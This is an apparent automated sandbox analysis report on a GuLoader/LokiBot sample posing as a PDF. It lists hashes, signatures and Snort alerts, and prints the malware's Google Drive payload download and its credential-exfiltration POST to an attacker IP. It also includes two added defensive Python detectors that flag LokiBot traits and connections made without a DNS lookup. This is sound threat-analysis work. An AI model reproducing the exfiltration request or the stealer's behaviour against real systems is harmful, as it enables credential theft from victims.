Windows Analysis Report
REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Overview

General Information

Sample Name: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe (the sandbox escapes non-ASCII characters in file names as #Uxxxx; #U00b7 is U+00B7 MIDDLE DOT, so the file presents as "REQUEST FOR OFFER 30-12-2022·pdf.exe", a fake .pdf extension on an .exe)
Analysis ID: 756301
MD5: b9f70f4146b846179fa182ac868d0c15
SHA1: 97cb5de0e0cc2f53cd73552f9d5b4381ab5a5907
SHA256: ff235029990af0449ce8f82c5546dfe37170d5e27ce1a22b0a43965a980344be

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
No Sigma rule has matched

Snort IDS alerts (all three fired on the same TCP connection, 192.168.11.20:49838 -> 157.245.36.27:80, at the same instant):

Timestamp: 11/30/22-00:31:37.333969
Source IP: 192.168.11.20
Destination IP: 157.245.36.27
SID: 2021641
Source Port: 49838
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-00:31:37.333969
Source IP: 192.168.11.20
Destination IP: 157.245.36.27
SID: 2024317
Source Port: 49838
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/30/22-00:31:37.333969
Source IP: 192.168.11.20
Destination IP: 157.245.36.27
SID: 2024312
Source Port: 49838
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | ReversingLabs: Detection: 17%
Source: http://157.245.36.27/~dokterpol/?page=2874 | Avira URL Cloud: Label: malware
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Joe Sandbox ML: detected
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Bekvemmeligheder
Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49836 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb | source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb | source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
Source: Binary string: mshtml.pdbUGP | source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL | source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_00406555 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_0040287E FindFirstFileW,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,

Networking

Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49838 -> 157.245.36.27:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49838 -> 157.245.36.27:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49838 -> 157.245.36.27:80
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 157.245.36.27
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0g-8k-docs.googleusercontent.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /~dokterpol/?page=2874 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 157.245.36.27
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A663AB80
    Content-Length: 178
    Connection: close
Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836
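The three Snort alerts above all fire on the single POST to 157.245.36.27 shown in this section. As an added example (it is not part of the Joe Sandbox report and not an Emerging Threats rule), the following Python parses HTTP request heads and scores the traits visible in that POST: the `Mozilla/4.08 (Charon; Inferno)` User-Agent, the `Content-Key` header, an HTTP/1.0 POST of `application/octet-stream`, and a bare-IP `Host`. The three sample requests are constructed from the report's own request lines (bodies omitted, the benign one invented); the helper names and the two-trait threshold are this example's choices.

```python
"""Score captured HTTP request heads for LokiBot exfiltration traits.

Added example, not part of the Joe Sandbox report. The traits are the ones
visible in the report's POST to 157.245.36.27; the helper names and the
two-trait threshold are this example's own choices.
"""
import re
from dataclasses import dataclass

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"   # the UA the ET 2021641 alert is named for
BARE_IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict          # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of one HTTP request (body ignored)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, version, headers)


def lokibot_indicators(req: HttpRequest) -> list:
    """Return the names of the LokiBot C2 traits this request exhibits."""
    hits = []
    if req.headers.get("user-agent") == LOKIBOT_UA:
        hits.append("charon_inferno_ua")
    if req.method == "POST" and "content-key" in req.headers:
        hits.append("content_key_header")      # present on the report's exfil POST
    if (req.method == "POST" and req.version == "HTTP/1.0"
            and req.headers.get("content-type") == "application/octet-stream"):
        hits.append("http10_octet_stream_post")
    if BARE_IP_HOST.match(req.headers.get("host", "")):
        hits.append("bare_ip_host")            # nothing to resolve, so nothing in DNS logs
    return hits


def is_lokibot_beacon(raw: str) -> bool:
    """Two independent traits are required; a lone bare-IP Host is common in benign traffic."""
    return len(lokibot_indicators(parse_request(raw))) >= 2


# Constructed request heads, copied from the report's HTTP lines (bodies omitted).
C2_POST = (
    "POST /~dokterpol/?page=2874 HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 157.245.36.27\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: A663AB80\r\n"
    "Content-Length: 178\r\n"
    "Connection: close\r\n\r\n"
)
STAGE_GET = (
    "GET /uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
BENIGN_POST = (   # constructed: an ordinary upload to a bare IP, one trait only
    "POST /api/upload HTTP/1.1\r\n"
    "Host: 10.0.0.5:8080\r\n"
    "User-Agent: curl/8.0.1\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 10\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in [("C2_POST", C2_POST), ("STAGE_GET", STAGE_GET), ("BENIGN_POST", BENIGN_POST)]:
        print(name, is_lokibot_beacon(raw), lokibot_indicators(parse_request(raw)))
```

Only the C2 POST crosses the threshold; the Google Drive stage download carries none of the traits, which is why the report's Snort alerts are silent on it, and the invented upload to a bare IP scores one trait and is left alone.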
Source: unknown | TCP traffic detected without corresponding DNS query: 157.245.36.27 (reported 12 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported twice)
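The "TCP traffic detected without corresponding DNS query" lines above are the sandbox's way of saying the C2 address is hard-coded: the sample resolved drive.google.com and the googleusercontent host before connecting to them, but never looked anything up before talking to 157.245.36.27. As an added example (not part of the report), the following Python reproduces that correlation over a constructed event list built from the report's traffic. The record layout, the DNS answer for the Google hosts, the extra connection on port 49839 and the late lookup are this example's assumptions; the resolver 1.1.1.1 is allow-listed because it is contacted by IP by design.

```python
"""Find TCP destinations that no earlier DNS answer resolved.

Added example, not part of the Joe Sandbox report. It reproduces the logic
behind the report's "TCP traffic detected without corresponding DNS query"
lines. The events are constructed from the report's traffic; their layout,
and all ports except 49836-49838, are this example's assumptions.
"""
from collections import defaultdict

RESOLVERS = frozenset({"1.1.1.1"})   # the sandbox's resolver; contacted by IP by design

# (time, "dns", qname, answer_ip)  or  (time, "tcp", src_ip, src_port, dst_ip, dst_port)
EVENTS = [
    (0.5, "tcp", "192.168.11.20", 49835, "1.1.1.1", 53),              # constructed: DNS over TCP
    (1.0, "dns", "drive.google.com", "142.250.185.238"),
    (1.1, "tcp", "192.168.11.20", 49836, "142.250.185.238", 443),
    (1.5, "dns", "doc-0g-8k-docs.googleusercontent.com", "142.250.185.161"),
    (1.6, "tcp", "192.168.11.20", 49837, "142.250.185.161", 443),
    (5.0, "tcp", "192.168.11.20", 49838, "157.245.36.27", 80),       # hard-coded C2, no lookup
    (5.2, "tcp", "192.168.11.20", 49839, "157.245.36.27", 80),       # constructed retry
    (6.0, "dns", "late.example.test", "157.245.36.27"),              # constructed: answer AFTER connect
]


def connections_without_dns(events, resolvers=RESOLVERS):
    """Map each un-resolved TCP destination to the source ports that reached it.

    Only answers seen *before* a connection count: a lookup that happens later
    cannot have produced the address the process already connected to.
    """
    resolved = set()
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        if ev[1] == "dns":
            resolved.add(ev[3])
        elif ev[1] == "tcp":
            _, _, _src, sport, dst, _dport = ev
            if dst not in resolved and dst not in resolvers:
                hits[dst].append(sport)
    return dict(hits)


def suspicious_destinations(events, min_connections=1):
    """Destinations worth triage, most-contacted first."""
    hits = connections_without_dns(events)
    return sorted((ip for ip, ports in hits.items() if len(ports) >= min_connections),
                  key=lambda ip: -len(hits[ip]))


if __name__ == "__main__":
    print(connections_without_dns(EVENTS))   # {'157.245.36.27': [49838, 49839]}
```

Dropping the resolver allow-list makes 1.1.1.1 show up as well, which is the usual first false positive when this check is run on real telemetry; the other common one is hosts resolved through a proxy or a cached answer from before the capture started.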
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.gopher.ftp://ftp.
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204053166.0000000000626000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356841847.0000000001984000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/%%doc-0g-8k-docs.googleusercontent.com
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/)
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391291036.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393764611.0000000001C10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391291036.00000000018B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpWr
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363023216.000000001D4A0000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54363172732.000000001D4AA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | HTTP traffic detected:
    POST /~dokterpol/?page=2874 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 157.245.36.27
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A663AB80
    Content-Length: 178
    Connection: close
Source: unknown | DNS traffic detected: queries for: drive.google.com
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
